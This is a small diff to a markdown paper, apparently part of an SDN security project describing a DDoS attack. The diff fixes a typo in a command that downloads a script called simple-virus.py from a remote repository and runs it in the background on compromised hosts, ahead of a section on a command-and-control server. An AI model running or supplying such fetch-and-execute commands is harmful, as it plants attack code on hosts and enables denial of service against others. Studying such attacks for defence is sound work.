ozeliurs/SDN-Security/papers/Anatomy of a DDoS Attack: From Host Infection to Service Denial.md

 The virus can be launched on the compromised hosts using the following command:

-`wget wget https://raw.githubusercontent.com/ozeliurs/SDN-Security/main/papers/.project-files/ddos-attack/simple-virus.py -O virus.py && python3 virus.py &`
+`wget https://raw.githubusercontent.com/ozeliurs/SDN-Security/main/papers/.project-files/ddos-attack/simple-virus.py -O virus.py && python3 virus.py &`

 ## Control and Command Server